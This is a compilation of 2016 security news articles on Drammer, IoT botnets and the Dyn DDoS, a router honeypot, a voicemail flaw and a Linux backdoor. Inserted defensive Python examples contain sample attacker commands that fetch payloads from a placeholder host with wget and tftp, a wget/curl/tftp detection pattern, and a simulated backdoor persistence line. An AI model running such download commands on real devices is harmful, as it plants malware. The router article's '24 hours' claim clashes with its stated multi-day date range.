Kaspersky has presented the Kaspersky Lab ICS-CERT, an infrastructure that aims to share knowledge of cyber threats and of securing industrial systems. The Kaspersky Lab ICS-CERT will coordinate the exchange of information between stakeholders, making the adoption of countermeasures and the rapid response to security incidents more efficient.

“Industrial Systems Emergency Response Team is a special Kaspersky Lab project that will offer the wide range of information services, starting from the intelligence on the latest threats and security incidents with mitigation strategies and all the way up to incident response and investigation consultancy and services. In addition to the latest intelligence about threats and vulnerabilities, Kaspersky Lab’s Industrial CERT will share expertise on compliance. Being a non-commercial project, ICS CERT will share information and expertise to its members free of charge.” wrote Kaspersky on the Kaspersky Lab ICS-CERT page.

Like any other CERT, the Kaspersky Lab ICS-CERT will report on the current threat landscape and share information on the latest threats, vulnerabilities, security incidents, mitigation strategies, compliance, and investigations.


It is important to highlight that the initiative launched by Kaspersky is a non-commercial project, the experts of the company will share information for free.

Of course, it is essential for the success of the initiative that ICS product vendors, government agencies, critical infrastructure operators, and other actors provide their valuable contributions.

Everyone benefits from the contributions made to this type of initiative. It will be particularly important for organizations using ICS/SCADA systems, which will find all the information aggregated in a single portal; in turn, they can share their own experience of cyber threats, increasing the level of awareness of the overall community.

“Today’s approach to cyber security highlights the importance of accumulating intelligence on the latest threats, in order to develop protection technologies. This is especially true for industrial infrastructure, which has specific threats, highly customized hardware and software, and strict requirements for reliability,” explained Andrey Doukhvalov, head of future technologies and chief security architect at Kaspersky.

“As a security vendor, we have years of experience analyzing threats and helping industrial operators with threat prevention and detection, incident response, staff training, and the prediction of future attack vectors. We are confident that sharing intelligence, or, in a broader way, exchanging knowledge between vendors and operators, is an important step towards more secure critical infrastructure. By establishing ICS-CERT we are expanding the availability of the industry’s expertise in a way that no other private security vendor has done before.”

New Drammer Android Hack lets Apps take Full control (root) of your Phone
24.10.2016 thehackernews Android
Earlier last year, security researchers from Google's Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered "root" access to millions of Android smartphones, allowing potentially anyone to take control of affected devices.
Researchers in the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that targets a device's dynamic random access memory (DRAM) using an attack called Rowhammer.
Although we are already aware of the Rowhammer attack, this is the very first time when researchers have successfully used this attack to target mobile devices.
What is DRAM Rowhammer Attack?
The Rowhammer attack against mobile devices is equally dangerous because it potentially puts all critical data on millions of Android phones at risk, at least until a security patch is available.
The Rowhammer attack involves executing a malicious application that repeatedly accesses the same "row" of transistors on a memory chip in a tiny fraction of a second in a process called "Hammering."
As a result, hammering a memory region can disturb neighboring rows, causing the row to leak charge into the next row, which eventually causes a bit to flip. And since bits encode data, this small change modifies that data, creating a way to gain control over the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row that could allow anyone to change the value of contents stored in the memory.
Is Your Android Phone Vulnerable?
To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER, and found their exploit successfully altered crucial bits of data in a way that completely roots big brand Android devices from Samsung, OnePlus, LG, Motorola, and possibly other manufacturers.
The researchers successfully rooted Android handsets including Google's Nexus 4 and Nexus 5; LG's G4; Samsung Galaxy S4 and Galaxy S5, Motorola's Moto G models from 2013 and 2014; and OnePlus One.
"Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is...(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions," the researchers wrote in their paper [PDF] titled, "Drammer: Deterministic Rowhammer Attacks on Mobile Platforms."
How does the DRAMMER Attack Work? (Exploit Source Code)

The researchers created an app — containing their rooting exploit — that requires no special user permissions in order to avoid raising suspicion. The DRAMMER attack would then need a victim to download the app laced with malware (researchers' exploit code) to execute the hack.
The researchers took advantage of an Android mechanism called the ION memory allocator to gain direct access to the dynamic random access memory (DRAM).
Besides giving every app direct access to the DRAM, the ION memory allocator also allows identifying adjacent rows on the DRAM, which is an important factor for generating targeted bit flips.
Knowing this, the researchers then had to figure out how to use the bit flipping to achieve root access on the victim's device, giving them full control of the target phone and the ability to do anything from accessing data to taking photos.
"On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict," the paper reads.
"We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control."
Once you download this malicious app, the DRAMMER exploit takes over your phone within minutes – or even seconds – and runs without your interaction. The attack continues to run even if you interact with the app or put your phone in "sleep" mode.
The researchers expect to soon publish an app [source code available here] that will let you test your Android smartphone yourself and anonymously include your results in a running tally, which will help researchers track the list of vulnerable devices.
DRAMMER Has No Quick Fix
The group of researchers privately disclosed its findings to Google in July, and the company designated the flaw as "critical," awarding the researchers $4,000 under its bug bounty program.
Google says the company has informed its manufacturing partners of the issue earlier this month and has developed a mitigation which it will include in its upcoming November security bulletin to make the DRAMMER attack much harder to execute.
However, the researchers warned that one could not replace the memory chip in Android smartphones that have already been shipped.
And even some software features that DRAMMER exploits are so fundamental and essential to any OS that they are difficult to remove or modify without impacting the user experience.
In short, the attack is not easy to patch in the next generation of Android phones.
Video Demonstration of DRAMMER Attack on Android 6.0.1

The researchers have also published two proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5.
In the second video, the researchers show how the DRAMMER attack can be combined with Stagefright bug that remains unpatched in many older Android handsets.

The Stagefright exploit gives the researchers an advanced shell, and by running the DRAMMER exploit, the shell gains root access.
The researcher's exploit can target the majority of the world's Android phones.
"Our research shows that practical large-scale Rowhammer attacks are a serious threat and while the response to the Rowhammer has been relatively slow from vendors, we hope our work will accelerate mitigation efforts both in industry and academia," the researchers concluded.
The group's research focuses on Android rather than iOS because the researchers are intimately familiar with Google's mobile OS, which is based on Linux. But the group says it would theoretically be possible to replicate the same attack on an iPhone with additional research.
For more detailed information, you can head on to this informational page about DRAMMER and this paper published early this morning.

24 hours in the life of my home router by Francisco J. Rodriguez
24.10.2016 securityaffairs Attack

Recently a massive DDoS attack has disconnected a large portion of users from the Internet, hackers exploited IoT devices. Is your router secure?
“Are we ready to live in a world where all devices are exposed to cyber attacks?”

That is how I opened my presentation at QurtubaCON16 – a cyber security event in Córdoba (Spain) – and how I will open the next event, HoneyCON16 (Guadalajara, Spain), on November 11th. My intention is that every person draws their own conclusions about the risks we all assume every time we connect our devices to the Internet.

Have you ever wondered what happens in your home router, and what threats lurk from the moment you press the power button?

In this article, I intend to analyze the attacks and cybersecurity events received on my personal router on a Spanish ISP. This information may make you aware of the high risk of having these devices connected to the web, even as we expose our lives on social media.

I have exposed my personal router to possible attacks because home routers haven’t been receiving the appropriate attention and, in some cases, people leave them on for the entire year. People tend to leave these devices completely exposed and don’t realize that the administrator control panel is sometimes vulnerable, that the devices are open to certain attacks, or that they have security flaws that have been patched neither by the Internet provider nor by the device manufacturer.

We recommend visiting http://routersecurity.org/ for more information about bugs and vulnerabilities detected in home routers in recent years, along with some recommendations.


In recent years, there has been news about vulnerabilities in routers distributed in Spain that show the seriousness of the matter:

http://www.hackplayers.com/2015/02/250k-routers-de-telefonica-mismas-claves-ssh.html
http://www.muycomputer.com/2015/03/20/700-000-routers-adsl-isp-vulnerables
http://www.redeszone.net/2015/01/06/los-routers-de-movistar-adb-pirelli-p-dga4001n-tienen-un-grave-fallo-de-seguridad/
http://www.pcworld.es/seguridad/un-estudio-espanol-descubre-60-vulnerabilidades-en-22-modelos-de-routers
What if an attacker gains access to the DNS settings of your router and modifies it?

It is not just about losing our privacy (because a cybercriminal could monitor your Internet browsing); it is about letting an attacker steal your identity, for example on your personal bank or company website, to obtain your credentials. This is just one example of what could really happen.


In many cases, the attacks received are automated, so if your router is within a cybercriminal’s range you could be a potential victim. The typical excuse “I am nobody” is not valid. You only need to be within range – it doesn’t need to be a personal attack. The greater the number of potential victims, the higher the percentage of success.

To collect all these events and cyberattacks, I use a sensor that redirects all the traffic sent to the public IP that corresponds to my own router. I monitor all incoming activity over the TCP and UDP port ranges, and I also monitor ICMP packets. I consider every packet addressed to my IP suspicious, and I follow up on any connection attempt to my TCP ports.

Keep in mind that the IP address of a possible attacker is not by itself a relevant fact, since different techniques can be used to hide the real source IP, or the attacker can route the attack through a device that has already been compromised. At no time did I advertise my IP address in order to receive attacks.

Data collection occurred between Wednesday, October 6 at 6PM and Thursday, October 24 at 6PM.

Once the data collection period finished, here are the results:


In 24 hours, my home router received a total of 20,070 events, of which I consider 4,678 to be attacks. Connections came from 92 different countries and targeted a total of 349 different ports.

More than half of the events came from Asia. Among the ports that received the most connections, SSH, Telnet, 443, 2323, RDP, VNC and 8080 stand out, among other services. Given that I never announced that my services were exposed, we could ask ourselves what they are looking for and how they found me. We can find out by analyzing everything that occurred.


Among the origins of the events, it has lately become normal to find Vietnam at the top. The explanation can be found in detail in the following article: http://securityaffairs.co/wordpress/52015/hacking/mirai-botnet.html

This is due to the large number of IoT devices infected with Mirai that have Spanish IP addresses among their targets.



The graph above shows the traffic received from attacks (not all the events) during these 24 hours of analysis (Origin country, ASN, IP and port):


Some notable countries by the number of attacks carried out (A, IP, and Port):




Most of the attacks received were of European and Asian origin. We also received a small share of attacks from Spain.




Analyzing some of the IPs that have attacked my router I could find the following web administration panels corresponding to cameras and routers:





Some of them do not need credentials for access and others have default credentials. They (or perhaps some machine behind that network) have visited my router, connected to my decoy ports, downloaded malware samples, tried to include me in their botnet, and used my gateway for attacks, among other activities.

Several malware samples were downloaded, including Mirai:


But it was not the only malware they tried to download. Below you can see the large number of download attempts made using wget:
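The aggregation behind the figures above (events versus attacks, distinct countries and ports, most-hit services, and the wget-style download attempts), as an added example rather than the author's sensor code; the record format, the event/attack distinction and the sample lines are constructed assumptions, and the addresses come from documentation ranges.

```python
import re
from collections import Counter

# Constructed sensor records (not the author's sensor output) in an assumed
# "ts|src_ip|country|proto|dport|payload" format; an empty payload means the
# connection carried no data.
SAMPLE_EVENTS = """\
2016-10-06T18:02:11|203.0.113.5|VN|tcp|23|
2016-10-06T18:02:12|203.0.113.5|VN|tcp|23|sh; wget http://198.51.100.7/x.sh
2016-10-06T18:05:40|198.51.100.23|CN|tcp|2323|
2016-10-06T18:07:03|198.51.100.23|CN|tcp|22|SSH-2.0-libssh
2016-10-06T18:09:15|192.0.2.77|RU|tcp|3389|
2016-10-06T18:10:00|192.0.2.77|RU|icmp|0|
2016-10-06T18:12:48|203.0.113.9|ES|tcp|8080|GET /cgi-bin/ HTTP/1.1
2016-10-06T18:15:21|203.0.113.9|ES|udp|5060|
2016-10-06T18:20:05|198.51.100.41|VN|tcp|23|cd /tmp; tftp -g -r bin 198.51.100.7
2016-10-06T18:22:33|192.0.2.130|US|tcp|443|
"""

PORT_NAMES = {22: "SSH", 23: "Telnet", 2323: "Telnet-alt", 3389: "RDP",
              5900: "VNC", 443: "HTTPS", 8080: "HTTP-alt", 5060: "SIP"}

# Assumed distinction (the article does not define it): an "event" is any
# packet or connection that reached the sensor; an "attack" is one that
# carried a payload (a banner, a command or an HTTP request).
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b", re.IGNORECASE)


def parse_events(text):
    """Turn the pipe-separated sensor records into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, country, proto, dport, payload = line.split("|", 5)
        events.append({"ts": ts, "src": src, "country": country,
                       "proto": proto, "dport": int(dport), "payload": payload})
    return events


def summarize(events):
    """Reproduce the article's headline figures: events, attacks, distinct
    countries and ports, the most-hit services and attacks per country."""
    attacks = [e for e in events if e["payload"]]
    ports = Counter(e["dport"] for e in events if e["proto"] != "icmp")
    return {
        "events": len(events),
        "attacks": len(attacks),
        "countries": len({e["country"] for e in events}),
        "ports": len(ports),
        "top_ports": [(PORT_NAMES.get(p, str(p)), n) for p, n in ports.most_common(3)],
        "by_country": Counter(e["country"] for e in attacks).most_common(),
    }


def download_attempts(events):
    """Flag payloads that try to fetch a file onto the device, the behaviour
    the article observed before Mirai and other samples were dropped."""
    return [e for e in events if DOWNLOAD_RE.search(e["payload"])]


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    summary = summarize(events)
    for key, value in summary.items():
        print(f"{key}: {value}")
    for e in download_attempts(events):
        print(f"download attempt from {e['src']} ({e['country']}) on port "
              f"{e['dport']}: {e['payload']}")
```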

Having seen all this data, you should ask yourself whether your home router could be attacked. Don’t ask whether it was attacked or not: ask when it will be. Thinking about the information presented in this article, maybe you are a little more aware that it will happen to you sooner or later. I hope that this time your router is not exposed, your credentials are not too weak, and you have not exposed more information than necessary. Maybe you’ve already been attacked and still don’t know it.

If you do not keep these tips in mind, perhaps your IP address will appear on the next list.

Best regards.

This and more articles are available at www.fwhibbit.es

My talk about honeypots:

Twitter: @0fjrm0

Hackers offered an IoT botnet for $7,500. The recent attack may be just a test
24.10.2016 securityaffairs BotNet

The security firm RSA revealed that in early October it discovered hackers advertising access to a huge IoT botnet on an underground criminal forum.
Last week, a massive DDoS attack against the Dyn DNS service, one of the most important domain name system (DNS) providers, caused an extended Internet outage. A large portion of Internet users were unable to reach major web services; many websites, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify, were down for users in the US.

The Dyn DNS service was flooded by a devastating wave of requests originating from millions of compromised IoT devices. Dyn reported that a huge army of hijacked Internet of Things devices had been abused by the attackers to power the massive DDoS attack.

The security intelligence firm Flashpoint published an interesting post on the massive DDoS attack in which it confirms that its experts observed Mirai bots driving the attack against Dyn DNS.

“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “

Below are the key findings of the report published by Flashpoint:

Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
Unfortunately, the situation could be worse because hackers are selling access to a huge botnet composed of compromised Internet of Things (IoT) devices.

The security firm RSA revealed that in early October it discovered hackers advertising access to a huge IoT botnet on an underground criminal forum.

“This is the first time we’ve seen an IoT botnet up for rent or sale, especially one boasting that amount of firepower. It’s definitely a worrying trend seeing the DDoS capabilities grow,” Daniel Cohen, head of the RSA’s FraudAction business unit, told Forbes.

According to RSA, the hackers advertised an IoT botnet able to power a DDoS attack with 1 Tbps of traffic, the same volume of traffic that flooded the French hosting provider OVH. It is not clear whether the botnet was composed of devices infected by the Mirai malware.

The hackers were offering a botnet composed of 50,000 devices for $4,600, while for 100,000 bots the price is $7,500.


Cohen clarified that RSA has no evidence that the botnet is linked to infrastructure that hit the Dyn DNS service on Friday.

“Hackers have long sold access to botnets, though haven’t explicitly advertised their use of IoT devices like connected cameras, fridges and kettles. The infamous LizardSquad amassed sizeable botnets for its LizardStresser “booter” – a DDoS weapon for hire – but it largely compromised vulnerable routers.” reported FORBES.

IoT vendors have been warned of the risk of future cyber attacks; the Chinese manufacturer of surveillance and home video devices targeted by the Mirai botnet, Xiongmai Technology (XM), has pushed out patches to prevent the hacking of its devices.

However, any device running firmware released before September 2015 that is still using the default username and password (well known in the hacker community) remains vulnerable to attacks that use the credentials to access the devices via Telnet.

Attacks like the one powered by the IoT botnet on Friday are difficult to mitigate; nevertheless, the adoption of a secondary, back-up DNS provider could make it harder for an attacker to take down a web service.

Other countermeasures are listed in the FORBES blog post.

InTheCyber discovered a serious flaw in messaging systems
24.10.2016 securityaffairs Mobil

Researchers at the InTheCyber firm have discovered a new, easily exploitable and dangerous vulnerability affecting messaging systems.
InTheCyber – Intelligence & Defense Advisors (www.inthecyber.com), a leader in offensive and defensive cyber security, has discovered in its R&D labs a new, easily exploitable and dangerous vulnerability affecting messaging systems.

Voicemail caller-ID spoofing is a fairly old flaw. When the mobile operator relies on the caller ID to authenticate the user to his voicemail, an attacker could falsify his caller ID in order to impersonate the user and gain access to his voicemail. At the moment, two of the biggest Italian mobile operators allow this kind of attack.

This undoubtedly raises problems about the privacy of the communications, especially the information stored inside the voicemail. Moreover, this old flaw could be weaponized in order to compromise other services.

For example, Telegram, WhatsApp, and Signal, when an activation code is requested, first send an SMS with the activation code. If the code is not entered promptly, these services resend the activation code through an automated call.

Depending on the configuration of the user's voicemail, the authentication code will end up inside his voicemail in the following scenarios: the user does not answer, the user is not reachable, the user's line is busy. In the first scenario, an attacker could try to request an activation code using the victim's account during the night-time. In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and then start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.

Besides caller-id spoofing, voicemail services often rely on a default or guessable PIN to authenticate a user, for example when he tries to access his voicemail from another phone number.

Basically, if the voicemail is somehow accessible to an unauthorized person, and if no two-factor authentication is enabled, every service that relies on an automated call to send an activation code can be hijacked.

Below a video PoC of the hack

Terrorism activity continues unabated – Tower of Babel under the surface
24.10.2016 securityaffairs Crime

This increase in activity led intelligence experts at Global Intelligence Insight to raise the terrorism threat level in Italy to #1.
With the eyes of the world set on the American Presidential elections on one side, and on Aleppo, Mosul and most recently Kirkuk on the other, underneath the online surface of the internet, multilingual jihadist channels and chat rooms spread like wildfire on protected, private and invite-only platforms, such as Telegram or ChatSecure.

Besides the usual terrorism and pro-violence propaganda and gore videos of executions portraying jihadists as rock stars proudly holding AK’s and explosive vests (some of them children aged no more than 7-9), the growing urgency of these radicals to widen the reach of their message to more countries is noticeable – always contemplating the goal of converting lone wolves (often described as “turbo conversions”, considering how rapidly it’s been happening), and the planning of operations, including how to get the logistics set up. Hence the relevance of language.

The geography of attack planning is strictly connected with the increasing activity and use of a certain language in both channels and chat groups.

Portuguese from Portugal, Italian, Urdu and Bengali are the most recent focuses (English and French are always a given).

Through our 24/7 monitoring and active infiltration in these hundreds of chatrooms, we can establish several types of correlations between the users, and extrapolate conclusions with quantifiable data. Some of the most recent ones are quite surprising even to our most experienced analysts.

Lately, we have identified a rapid and aggressive adherence to Italian channels. As an example, a recently created Italian channel had an increase of 430 active members in just 36 hours, and this uncommon pattern made several alarms ring all over our offices.

We are talking about gatekeepers, operatives displaying tactical experience and a general population of sympathizers to the Salafi jihadist cause, communicating and sharing propaganda and battlefront news in fluent Italian.

This increase in terrorism-linked activity led us to raise the threat level in Italy to Tier #1, and to look out for any kind of ongoing operation.

There are also many other types of transversal trends that we analyze and correlate, to validate a certain conclusion, such as the most recent and growing concern on communicating in the most secure and anonymous way possible. The release of detailed and complex manuals by the so-called “Islamic OPSEC IT Team”, with contents clearly developed by IT professionals, is a clear illustration of this fact.

And with the self-proclaimed Islamic State being gradually strangled in both Syria and Iraq, suffering heavy casualties North and South, many seasoned veterans are already trying to make their way to Europe. The idea of a physically established command center issuing instructions – a notion to which several intelligence companies still cling – is completely obsolete.

This war’s most urgent frontline is still – and will continue to be – online.

NOTE: This brief article is a part of a full intelligence assessment developed by Global Intelligence Insight.

Paolo Cardoso, MA – With over 10 years of experience in Public Diplomacy and Business Intelligence, and having developed several strategic investment projects in the fields of Security, Defense and Energy in Kosovo, Bulgaria, Poland, Ukraine, Armenia, Georgia and the Russian Federation, today he is the President and Co-founder of the Portuguese Euro-Atlantic Diplomacy Agency, and an Intelligence Analyst at Global Intelligence Insight.

American hacker The Jester defaced a Russian Government website
23.10.2016 securityaffairs Hacking

The popular American hacker The Jester defaced a Russian Government website in retaliation for the recent attacks against US targets.
We are in the middle of a battle in cyberspace; with the approach of the Presidential elections, experts have observed an intensification of hacking attacks.

While hackers target parties and personnel involved in the Presidential campaigns, the US Government threatens Russia, blaming its cyber army for the attacks.

Nation state actors are not the only ones involved in the battle; there are also hacktivists and patriotic hackers who could power cyber attacks against the adversary.

This week, hackers from the NewWorldHackers crew and Anonymous targeted the Dyn DNS service to send a message to Russia, and in the same hours the notorious American cyber vigilante The Jester defaced the website of the Russian Ministry of Foreign Affairs, MID.ru.

The hack was not so complicated for the expert hacker, who found a flaw in the website and exploited it to compromise the Russian Government portal.

The Jester targeted the website of the Russian Government in retaliation for attacks against the American entities.

The popular hacker gained access to the Russian government ministry’s website and posted the following message:

“Stop attacking Americans.”

“Comrades! We interrupt regular scheduled Russian Foreign Affairs Website programming to bring you the following important message,” he wrote. “Knock it off. You may be able to push around nations around you, but this is America. Nobody is impressed.”

“His hacking of the website included this gag: Visitors are subjected to the ear-piercing sound of an American civil alert message — that shrieking dial tone that accompanies emergency weather broadcasts.” reported CNNMoney.

The Jester sent a message to President Putin to blame him for lying about the involvement of Russian hackers in the recent attacks against the American organizations.
“Let’s get real, I know it’s you, even if by-proxy, and you know it’s you,” he wrote. “Now, get to your room. Before I lose my temper.”
JΞSTΞR ✪ ΔCTUAL³³º¹ (@th3j35t3r) tweeted on 22 Oct 2016 at 20:32:
“#ICYMI MSG 'From Russia with Love' - I'm Jester & I approve this message via the Russian Foreign Affairs Website >> http://bit.ly/2egvpiM”
In the past, The Jester vigilante has conducted several operations against jihadist communities online. The popular hacker told CNNMoney journalists that he chose to attack the Russian Government website in response to the massive DDoS against the Dyn DNS service that cut off a large portion of US netizens from the Internet.

“I wanted to poke them in the eye and stop feeling like US is just taking it on the chin. Again,” he said. “I’m not gonna sit around watching these f—-rs laughing at us.”
“It’s 4 a.m. in Moscow right now and a weekend. I’m hoping they can’t fix the hole til Monday,” he said.
“Think of this as a professional courtesy,” his public warning states. “Or if you prefer message from ‘USA with love.'”

Linux.BackDoor.FakeFile.1, a new Linux backdoor in the wild
23.10.2016 securityaffairs Virus

Security researchers at the security firm Doctor Web have spotted a new Linux backdoor dubbed Linux.BackDoor.FakeFile.1 in the wild.
Security firms continue to observe an increasing number of malware specifically designed to target Linux-based systems.

Linux, like any other operating system, can be infected by malicious code designed to compromise hosts and gain control over them.

Linux architectures are everywhere; it is quite easy for crooks to find vulnerable Linux servers exposed on the Internet or poorly designed Internet of Things devices that are not properly configured or protected.

It is normal for cyber criminals to focus their efforts on hacking Linux systems too. Linux malware is a natural evolution of the threat landscape because the Linux OS is the preferred platform within data centers, cloud infrastructure for businesses, and application servers.

Linux is also the core of Android devices and many other embedded systems.

The latest malware observed in the wild is Linux.BackDoor.FakeFile.1, spotted by experts at the security firm DrWeb.

The Linux.BackDoor.FakeFile.1 Trojan spreads through PDF, Microsoft Office, or OpenOffice documents.

When a victim launches the file and triggers the execution of the malware, it saves itself to the folder .gconf/apps/gnome-common/gnome-common in the user’s home directory.

Then Linux.BackDoor.FakeFile.1 searches for a hidden file whose name matches the file name of the malware, and replaces the executable file with it.

“For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv .AnyName.pdf AnyName.pdf. If the file is not found, Linux.BackDoor.FakeFile.1 creates it and opens it in the program gedit.” reads the analysis published by DrWeb.

The malware checks the installed Linux distribution; on every distribution other than openSUSE, it writes a command to the file <HOME>/.profile or the file <HOME>/.bash_profile to gain persistence. The next step is retrieving the configuration data from its file and decrypting it; then the Trojan launches the following threads:

A first thread communicates with the command and control (C&C) server.
A second thread monitors the duration of the connection that will be shut down after 30 minutes without activity.
Below is the complete list of the Linux.BackDoor.FakeFile.1 abilities:

Send the C&C server the quantity of messages transferred during the session;
Send a list of the contents of the specified folder;
Send the C&C server the specified file or a folder with all its contents;
Delete a directory;
Delete a file;
Rename a folder;
Remove itself;
Launch a new copy of a process;
Close the current session;
Establish backconnect and run sh;
Terminate backconnect;
Open the executable file of the process for writing;
Close the process file;
Create a file or folder;
Write the transmitted values to a file;
Obtain the names, permissions, sizes, and creation dates of files in the specified directory;
Set 777 privileges on the specified file;
Terminate the backdoor’s operation.
The researchers from DrWeb highlighted that Linux.BackDoor.FakeFile.1 does not require root privileges to work; it operates with the rights of the current user.

Technical details of this Linux backdoor are available here.
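As an added example that is not part of the article or of DrWeb's analysis, the following read-only Python check looks for the on-disk indicators described above: the drop directory under the home folder, document-named files whose content is actually an ELF executable, and persistence lines in .profile/.bash_profile that reference the drop directory. The document extensions checked and the sample home directory it builds are assumptions constructed for the demonstration.

```python
"""Host-side indicator check for the Linux.BackDoor.FakeFile.1 behaviour
described in the article (added example, not DrWeb's tooling).

Reported indicators:
  drop_dir_present        $HOME/.gconf/apps/gnome-common/gnome-common exists
  elf_with_document_name  a .pdf/.doc/.odt/... file that starts with ELF magic
  profile_persistence     .profile or .bash_profile line referencing the drop dir
"""
import os
import tempfile
from pathlib import Path

DROP_DIR = Path(".gconf/apps/gnome-common/gnome-common")   # path named in the article
PROFILE_FILES = (".profile", ".bash_profile")               # persistence files named in the article
DOC_SUFFIXES = {".pdf", ".doc", ".docx", ".odt", ".ods", ".odp"}  # assumed document extensions
ELF_MAGIC = b"\x7fELF"


def is_elf(path: Path) -> bool:
    """True if the file begins with the ELF magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def scan_home(home) -> list:
    """Return sorted (indicator, location) pairs found under one home directory."""
    home = Path(home)
    findings = []

    drop = home / DROP_DIR
    if drop.is_dir():
        findings.append(("drop_dir_present", str(drop)))

    # Walk the whole home directory (hidden folders included): an ELF binary
    # carrying a document name is suspicious wherever it sits.
    for root, _dirs, files in os.walk(home):
        for name in files:
            path = Path(root) / name
            if path.suffix.lower() in DOC_SUFFIXES and is_elf(path):
                findings.append(("elf_with_document_name", str(path)))

    needle = DROP_DIR.as_posix()
    for profile in PROFILE_FILES:
        path = home / profile
        if not path.is_file():
            continue
        for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            if needle in line:
                findings.append(("profile_persistence", f"{path}:{lineno}"))

    return sorted(findings)


def build_sample_home(infected: bool = True) -> Path:
    """Construct a throwaway home directory for the demonstration.

    With infected=True it reproduces the three indicators using a stub that
    carries only the ELF magic bytes; no real binary is written."""
    home = Path(tempfile.mkdtemp(prefix="fakefile-demo-"))
    downloads = home / "Downloads"
    downloads.mkdir()
    (downloads / "report.pdf").write_bytes(b"%PDF-1.4\n% constructed benign sample\n")
    (home / ".profile").write_text("# constructed sample profile\nexport PATH=$HOME/bin:$PATH\n")
    if infected:
        stub = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9       # ELF header stub only
        (downloads / "Invoice.pdf").write_bytes(stub)            # the "document" the victim opened
        drop = home / DROP_DIR
        drop.mkdir(parents=True)
        (drop / "Invoice.pdf").write_bytes(stub)                 # the copy saved to the drop dir
        with open(home / ".profile", "a") as fh:                 # the persistence line
            fh.write("$HOME/.gconf/apps/gnome-common/gnome-common/Invoice.pdf &\n")
    return home


if __name__ == "__main__":
    for indicator, where in scan_home(build_sample_home()):
        print(f"{indicator:24} {where}")
```

Pointing scan_home at a real home directory produces the same indicator list; an empty list means none of the three described artefacts is present.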

NewWorldHacking and Anonymous behind massive DDoS attack on Dyn DNS service
22.10.2016 securityaffairs Attack

NewWorldHacking & Anonymous powered the massive DDoS attack against the Dyn DNS service that caused a serious Internet outage for many netizens.
The cyber attack against the Dyn DNS service that affected a huge portion of Internet users in the US is monopolizing the media.

IT security experts have no doubts, hackers powered the massive DDoS attack with a huge botnet composed of IoT devices infected by the Mirai malware.

We are all trying to discover who is behind the attack and what its motivation is. On Friday, while the massive DDoS attack was creating panic among netizens, WikiLeaks invited its supporters to stop the offensive.

WikiLeaks (@wikileaks) tweeted on 21 Oct 2016 at 23:09:
“Mr. Assange is still alive and WikiLeaks is still publishing. We ask supporters to stop taking down the US internet. You proved your point.”
WikiLeaks confirmed that its supporters launched the massive DDoS attack to protest against the Ecuadorian government’s decision to cut off the Internet connection of WikiLeaks founder Julian Assange due to the US political election leaks.
Yesterday evening I reached the hacking collective NewWorldHacking via Twitter, asking them for more information about the attack.
The hackers confirmed to me that they started the massive attack against the Dyn DNS service; anyway, they were not alone.
According to NewWorldHacking, many other groups linked to the Anonymous collective participated in the attack.
When I asked which Anon groups were involved, they replied to me that many crews targeted the Dyn DNS service.
“Anonymous, Pretty much all of Anonymous” said NewWorldHacking.
They confirmed to me that they are testing the capability of their botnet, highlighting that the DDoS attack against the Dyn DNS Service was carried out with the Mirai botnet alongside other booters.
Most interesting is the motivation that they provided me. Not only Assange’s case. They told me that the attack is also a message for the Russian Government.

“If Russia is against the U.S we are against Russia. This is where we draw the line, we are sending a warning message to Russia. “

The information I collected seems to be in line with the statements that the hacktivist groups Anonymous and NewWorldHacking released to Politico.

Indian Banks fear a security breach that affected up to 3.25 million cards
22.10.2016 securityaffairs Crime

A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards.
A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards (0.5 percent of the nearly 700 million debit cards issued by banks in India).

“A slew of banks in India are replacing or asking their customers to change security codes of as many as 3.25 million debit cards due to fears that the card data may have been stolen in one of the country’s largest-ever cyber security incidents.” reported Reuters.

In September, several banks’ customers reported to Visa, Mastercard, and RuPay (National Payments Corp of India (NPCI)) fraudulent activities involving their debit cards. According to the chief of NPCI, the fraudulent transactions spotted by the clients were prevalently observed in China and the United States.

